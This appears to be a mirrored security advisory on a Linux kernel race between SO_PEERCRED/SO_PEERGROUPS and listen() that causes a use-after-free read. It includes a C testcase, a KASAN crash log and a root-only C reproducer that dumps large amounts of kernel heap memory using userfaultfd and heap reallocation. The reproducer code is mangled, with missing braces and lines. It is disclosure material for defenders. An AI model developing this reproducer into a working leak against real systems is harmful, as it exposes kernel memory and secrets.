Thursday, November 18, 2021

Linux SO_PEERCRED / SO_PEERGROUPS Race Condition / Use-After-Free

Linux: UAF read: SO_PEERCRED and SO_PEERGROUPS race with listen() (and connect())

# bug description

In sock_getsockopt() (in net/core/sock.c), the handlers for the
socket options SO_PEERCRED (has probably had a data race since forever
that got turned into a UAF read in v2.6.36, commit \"af_unix: Allow
SO_PEERCRED to work across namespaces\") and
SO_PEERGROUPS (introduced in v4.13, commit \"net: introduce SO_PEERGROUPS
getsockopt\") don't use any locking when copying data from
sk->sk_peer_cred to userspace.

This can race with operations that update sk->sk_peer_cred:

- unix_stream_connect() (via copy_peercred(), on CLOSE->ESTABLISHED)
- unix_listen() (via init_peercred(), on CLOSE->LISTEN or LISTEN->LISTEN)

This means that if the creds are replaced and freed at the wrong time, a
use-after-free read occurs.

From what I can tell, the impact on the kernel is limited to data leakage.
Theoretically, it could also lead to an out-of-bounds *write* to
*userspace* memory if a victim process calls SO_PEERGROUPS on a socket
whose ->sk_peer_cred is going away; however, in a normal scenario,
SO_PEERGROUPS would only be called on a socket from accept(), and a
less-privileged attacker wouldn't be able to switch out the ->sk_peer_cred
on that socket.

# simple testcase

this issue can be demonstrated with the following testcase.

Note that this testcase is using SO_PEERCRED in a weird way: It reads
the \"peer credentials\" of a listening socket, which doesn't really make
any semantic sense. As far as I can tell from reading the code, you
could also trigger the same UAF by racing SO_PEERCRED with repeated
calls to connect() and shutdown(<fd>, SHUT_RDWR) instead of listen(),
but then the race would get more complicated.

// compile with \"gcc -pthread -o peercred_uaf peercred_uaf.c -Wall\"
#define _GNU_SOURCE
#include <pthread.h>
#include <sys/fsuid.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <err.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/syscall.h>

static int s;
static uid_t my_uid;
static gid_t my_gid;

void *ucred_thread(void *dummy) {
while (1) {
struct ucred ucred;
socklen_t optlen = sizeof(ucred);
if (getsockopt(s, SOL_SOCKET, SO_PEERCRED, &ucred, &optlen))

int main(void) {
my_uid = getuid();
my_gid = getgid();

s = socket(AF_UNIX, SOCK_STREAM, 0);
if (s == -1) err(1, \"socket\");
struct sockaddr_un bind_addr = {
.sun_family = AF_UNIX,
.sun_path = \"/tmp/unix-test-socket\"
if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr)))
err(1, \"bind\");

pthread_t thread;
if (pthread_create(&thread, NULL, ucred_thread, NULL))
errx(1, \"pthread_create\");

while (1) {
if (listen(s, 16))
// avoid glibc's automatic thread sync in set*id() wrappers!
// note that setfsuid() doesn't reallocate on no-op request.
if (syscall(__NR_setresuid, my_uid, my_uid, my_uid))
err(1, \"setresuid(raw)\");

This results in the following splat:

BUG: KASAN: use-after-free in sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555)
Read of size 4 at addr ffff8880355c7c64 by task peercred_uaf/619

CPU: 2 PID: 619 Comm: peercred_uaf Not tainted 5.15.0-rc2-00008-g4c17ca27923c #849
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
Call Trace:
dump_stack_lvl (lib/dump_stack.c:107 (discriminator 1))
print_address_description.constprop.0 (mm/kasan/report.c:257)
kasan_report.cold (mm/kasan/report.c:443 mm/kasan/report.c:459)
sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555)
__sys_getsockopt (net/socket.c:2216)
__x64_sys_getsockopt (net/socket.c:2232)
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)
RIP: 0033:0x7f93cd99a5ca
Code: 48 8b 0d c9 08 0c 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 37 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 96 08 0c 00 f7 d8 64 89 01 48
All code
0: 48 8b 0d c9 08 0c 00 mov 0xc08c9(%rip),%rcx # 0xc08d0
7: f7 d8 neg %eax
9: 64 89 01 mov %eax,%fs:(%rcx)
c: 48 83 c8 ff or $0xffffffffffffffff,%rax
10: c3 ret
11: 66 2e 0f 1f 84 00 00 cs nopw 0x0(%rax,%rax,1)
18: 00 00 00
1b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)
20: 49 89 ca mov %rcx,%r10
23: b8 37 00 00 00 mov $0x37,%eax
28: 0f 05 syscall
2a:* 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax <-- trapping instruction
30: 73 01 jae 0x33
32: c3 ret
33: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08d0
3a: f7 d8 neg %eax
3c: 64 89 01 mov %eax,%fs:(%rcx)
3f: 48 rex.W

Code starting with the faulting instruction
0: 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax
6: 73 01 jae 0x9
8: c3 ret
9: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08a6
10: f7 d8 neg %eax
12: 64 89 01 mov %eax,%fs:(%rcx)
15: 48 rex.W
RSP: 002b:00007f93cd89bec8 EFLAGS: 00000246 ORIG_RAX: 0000000000000037
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f93cd99a5ca
RDX: 0000000000000011 RSI: 0000000000000001 RDI: 0000000000000003
RBP: 00007f93cd89bef0 R08: 00007f93cd89bee0 R09: 00007f93cd89c700
R10: 00007f93cd89bee4 R11: 0000000000000246 R12: 00007ffff07f1cee
R13: 00007ffff07f1cef R14: 00007f93cd89c700 R15: 0000000000000000

Allocated by task 618:
kasan_save_stack (mm/kasan/common.c:38)
__kasan_slab_alloc (mm/kasan/common.c:46 mm/kasan/common.c:434 mm/kasan/common.c:467)
kmem_cache_alloc (./include/linux/kasan.h:254 mm/slab.h:519 mm/slub.c:3206 mm/slub.c:3214 mm/slub.c:3219)
prepare_creds (kernel/cred.c:262)
__sys_setresuid (kernel/sys.c:666)
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)

Freed by task 618:
kasan_save_stack (mm/kasan/common.c:38)
kasan_set_track (mm/kasan/common.c:46)
kasan_set_free_info (mm/kasan/generic.c:362)
__kasan_slab_free (mm/kasan/common.c:368 mm/kasan/common.c:328 mm/kasan/common.c:374)
kmem_cache_free (mm/slub.c:1725 mm/slub.c:3483 mm/slub.c:3499)
rcu_core (kernel/rcu/tree.c:2515 kernel/rcu/tree.c:2743)
__do_softirq (./include/linux/instrumented.h:71 ./include/linux/atomic/atomic-instrumented.h:27 ./include/linux/jump_label.h:266 ./include/linux/jump_label.h:276 ./include/trace/events/irq.h:142 kernel/softirq.c:559)

Last potentially related work creation:
kasan_save_stack (mm/kasan/common.c:38)
kasan_record_aux_stack (mm/kasan/generic.c:348)
call_rcu (kernel/rcu/tree.c:2988 kernel/rcu/tree.c:3067)
init_peercred (./include/linux/cred.h:288 ./include/linux/cred.h:281 net/unix/af_unix.c:613)
unix_listen (net/unix/af_unix.c:648)
__sys_listen (net/socket.c:1727)
__x64_sys_listen (net/socket.c:1734)
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)

The buggy address belongs to the object at ffff8880355c7c40
which belongs to the cache cred_jar of size 192
The buggy address is located 36 bytes inside of
192-byte region [ffff8880355c7c40, ffff8880355c7d00)
The buggy address belongs to the page:
page:ffffea0000d57100 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x355c4
head:ffffea0000d57100 order:2 compound_mapcount:0 compound_pincount:0
flags: 0x4000000000010200(slab|head|zone=1)
raw: 4000000000010200 ffffea0000d57208 ffffea0000d57008 ffff88800642d1c0
raw: 0000000000000000 0000000000190019 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected

Memory state around the buggy address:
ffff8880355c7b00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
ffff8880355c7b80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
>ffff8880355c7c00: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb
ffff8880355c7c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
ffff8880355c7d00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc

# root-only reproducer for normal systems
The following is a simple reproducer that attempts to use this issue to
dump gigabytes of out-of-bounds kernel memory via SO_PEERGROUPS, which
effectively reads a copy length (sk->sk_peer_cred->group_info->ngroups)
from a dangling pointer in groups_to_user().
(Note: There are two functions called groups_to_user(). The relevant one
is in net/core/sock.c.)

This isn't quite a real exploit - it **requires root privileges** to
call setgroups() and, if userfaultfd is restricted, also to trap a kernel
fault with userfaultfd. I expect that you could get around those
limitations with some work though, assuming that the attacker is running
in a normal Linux userspace.

Note that this bug can still be used to dump gigabytes of kernel heap
memory, even if CONFIG_HARDENED_USERCOPY is enabled, because the
out-of-bounds read occurs outside of usercopy code:

static int groups_to_user(gid_t __user *dst, const struct group_info *src)
struct user_namespace *user_ns = current_user_ns();
int i;

for (i = 0; i < src->ngroups; i++)
if (put_user(from_kgid_munged(user_ns, src->gid[i]), dst + i))
return -EFAULT;

return 0;

// gcc -o peergroups-leak peergroups-leak.c -Wall -pthread
#define _GNU_SOURCE
#include <pthread.h>
#include <stdbool.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <err.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <grp.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <fcntl.h>
#include <sys/eventfd.h>
#include <limits.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <linux/userfaultfd.h>
#include <linux/membarrier.h>

// kernel sets upper limit: 65536.
// up to 2 pages will be served by slabs, we probably don't want that.
// choose a size between order-3 and order-4 (means needs order-4 page)
#define ALLOC_SIZE ((0x1000 << 3) * 3 / 2)
#define NUM_GROUPS ((ALLOC_SIZE - 8) / 4)
#define OUTPUT_MAPPING_LEN 0x400000000

static int s;
static int launch_eventfd;
static unsigned char *output_mapping;

static void *getsockopt_threadfn(void *dummy) {
eventfd_t evval;
if (eventfd_read(launch_eventfd, &evval))
err(1, \"eventfd_read\");
socklen_t optlen = INT_MAX;
if (getsockopt(s, SOL_SOCKET, SO_PEERGROUPS, output_mapping, &optlen)) {
//system(\"cat /proc/$PPID/maps | grep -v AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\");
return NULL;

void dump(char *label) {
=== DUMP %s ===\
\", label);
system(\"grep 'Node.*Unmovable' /proc/pagetypeinfo\");

int main(void) {
char dummy_char;

// set up sleep-inducing mapping
output_mapping = mmap(NULL, OUTPUT_MAPPING_LEN+0x1000, PROT_READ|PROT_WRITE,
if (output_mapping == MAP_FAILED) err(1, \"mmap\");
if (mprotect(output_mapping+OUTPUT_MAPPING_LEN, 0x1000, PROT_NONE))
err(1, \"mprotect\");
int uffd = syscall(__NR_userfaultfd, O_CLOEXEC);
if (uffd == -1) err(1, \"userfaultfd\");
struct uffdio_api api = {
.api = UFFD_API,
.features = 0
if (ioctl(uffd, UFFDIO_API, &api))
err(1, \"UFFDIO_API\");
struct uffdio_register reg = {
.range = {.start = (unsigned long)output_mapping, .len = 0x1000},
if (ioctl(uffd, UFFDIO_REGISTER, &reg))
err(1, \"UFFDIO_REGISTER\");

// prepare getsockopt() thread
launch_eventfd = eventfd(0, 0);
if (launch_eventfd == -1) err(1, \"eventfd\");
pthread_t thread;
if (pthread_create(&thread, NULL, getsockopt_threadfn, NULL))
errx(1, \"pthread_create\");

// set up for reallocation primitive
int realloc_fd = open(\"/proc/self/maps\", O_RDONLY);
if (realloc_fd == -1) err(1, \"open maps\");

char tmpdir[] = \"/tmp/blah.XXXXXX\";
if (mkdtemp(tmpdir) == NULL) err(1, \"mkdtemp\");
if (chdir(tmpdir)) err(1, \"chdir tmpdir\");
char dummy_name[100];
memset(dummy_name, 'A', 99);
dummy_name[99] = '\\0';
char move_target[200];
sprintf(move_target, \"d/%s\", dummy_name);
mkdir(dummy_name, 0700);
char file_path[200];
sprintf(file_path, \"%s/a\", dummy_name);
int path_len = strlen(tmpdir) + strlen(file_path); // approximate
int fd = open(file_path, O_CREAT|O_RDWR, 0600);
if (fd == -1) err(1, \"open deep file\");
if (mmap((void*)0x10000UL, 0x1000, PROT_READ, MAP_SHARED, fd, 0) == MAP_FAILED)
err(1, \"mmap deep\");
bool half_deep_probed = false;
while (path_len < ALLOC_SIZE) {
mkdir(\"d\", 0700);
if (rename(dummy_name, move_target)) err(1, \"rename\");
if (rename(\"d\", dummy_name)) err(1, \"rename 2\");
path_len += strlen(dummy_name) + 1;
if (!half_deep_probed && path_len >= ALLOC_SIZE / 2) {
half_deep_probed = true;
if (pread(realloc_fd, &dummy_char, 1, 0) != 1)
err(1, \"read maps half-deep\");

s = socket(AF_UNIX, SOCK_STREAM, 0);
if (s == -1) err(1, \"socket\");
struct sockaddr_un bind_addr = {
.sun_family = AF_UNIX,
.sun_path = \"/tmp/unix-test-socket\"
if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr)))
err(1, \"bind\");

pid_t child = fork();
if (child == -1) err(1, \"fork\");
if (child == 0) {
gid_t gid_list[NUM_GROUPS];
gid_t my_gid = getgid();
for (int i=0; i<NUM_GROUPS; i++) {
gid_list[i] = my_gid; // (kernel doesn't deduplicate)
dump(\"before setgroups\");
if (setgroups(NUM_GROUPS, gid_list))
err(1, \"setgroups\");
dump(\"after setgroups, expect -1\");
if (listen(s, 16))
err(1, \"listen in child\");
return 0;
int status;
if (waitpid(child, &status, 0) != child)
err(1, \"wait\");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, \"child didn't exit cleanly\");

// wildly flailing around in the hope of flushing out the task
// (but not the creds yet)
usleep(400 * 1000);
for (int i=0; i<4; i++)
syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, 0);

// launch getsockopt, and wait for it to start
if (eventfd_write(launch_eventfd, 1)) err(1, \"eventfd_write\");
usleep(500 * 1000);

// schedule RCU freeing of the creds
if (listen(s, 16))
err(1, \"listen in parent\");
// wait for RCU (twice to be safe - yes, this is senseless voodoo)
for (int i=0; i<2; i++)
syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, 0);

// crappy reallocation attempt, should overwrite length with ASCII
dump(\"pre-reallocation, expect +1\");
if (pread(realloc_fd, &dummy_char, 1, 0) != 1)
err(1, \"read maps deep\");
dump(\"post-reallocation, expect -1\");

// resume getsockopt
struct uffdio_zeropage zeropage = {
.range = {.start = (unsigned long)output_mapping, .len = 0x1000}
if (ioctl(uffd, UFFDIO_ZEROPAGE, &zeropage)) err(1, \"ZEROPAGE\");

// wait for getsockopt to finish
if (pthread_join(thread, NULL)) err(1, \"pthread_join\");

// dump results
int pagemap_fd = open(\"/proc/self/pagemap\", O_RDONLY);
if (pagemap_fd == -1) err(1, \"open pagemap\");
unsigned long filled_pages = 0;
for (unsigned long addr = (unsigned long)output_mapping;
addr < (unsigned long)output_mapping + OUTPUT_MAPPING_LEN;
addr += 0x1000) {
uint64_t val;
if (pread(pagemap_fd, &val, sizeof(val), addr / 0x1000 * 8) != sizeof(val))
err(1, \"pagemap read\");
if ((val >> 62) == 0)
printf(\"got %lu pages\
\", filled_pages);
FILE *hexdump = popen(\"hexdump -C\", \"w\");
if (!hexdump)
err(1, \"popen\");
fwrite(output_mapping, filled_pages * 0x1000, 1, hexdump);

# disclosure deadline
This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2021-12-27.

Found by: [email protected]

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore